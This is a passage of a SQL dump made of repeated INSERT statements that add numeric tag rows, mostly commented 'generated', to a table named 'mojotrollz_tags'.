1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92550, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92551, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92552, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92693, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92694, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92695, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92696, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92699, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92700, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92703, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (93192, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94039, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94039, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94183, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94184, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94185, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94186, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94187, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94188, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94189, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94190, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94191, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (95449, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97700, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97700, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97701, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97701, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97801, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97801, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97802, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97802, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97803, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97803, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98343, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98347, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98348, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98349, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98350, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98351, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98354, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (100028, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (100035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101748, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101749, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101750, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101766, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101767, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101768, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101769, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101770, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101771, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101772, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101773, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101774, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101775, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101776, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101777, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101778, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101779, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101811, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101811, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101812, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101812, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101831, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101831, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101832, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101832, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101833, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101833, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101834, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101834, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101835, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101836, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101837, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101838, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101839, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101840, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101841, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101842, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101845, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101846, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101847, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101848, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101849, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101850, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101851, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101852, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101853, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101854, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101854, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101855, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101855, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102984, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102985, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102986, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102988, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102989, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102990, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102991, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102992, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102993, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102994, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102995, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102996, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102997, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102998, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102999, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103000, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103001, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103002, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103003, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103004, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103005, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103005, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103006, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103006, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103007, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103007, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103009, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103009, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103010, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103010, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103011, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103011, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103012, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103012, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103015, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103015, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103016, 2, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103016, 2, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103600, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103628, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103663, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103664, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103664, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103680, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103687, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103694, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103695, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103711, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103713, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103727, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103729, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103750, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103751, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103770, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103771, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103772, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103773, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103793, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103795, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103802, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103811, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103815, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103820, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103820, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103821, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103821, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104555, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104564, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104574, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104575, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104589, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104589, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104591, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104591, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104593, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104600, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104600, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105169, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105170, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105171, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105172, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105174, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105175, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105176, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105188, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105568, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105576, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105578, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105579, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105581, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106318, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106319, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106325, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106326, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106327, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106335, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106336, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106528, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106529, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106638, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106641, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (107037, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (107039, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (107040, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (107041, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (107042, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110230, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110231, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110232, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110233, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110234, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110235, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110236, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111094, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111095, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111149, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111202, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111203, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111204, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111205, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111206, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111207, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111212, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111215, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111216, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111217, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111220, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111221, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111222, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111223, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111224, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111225, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111226, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111227, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111254, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111255, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111256, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111257, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111258, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 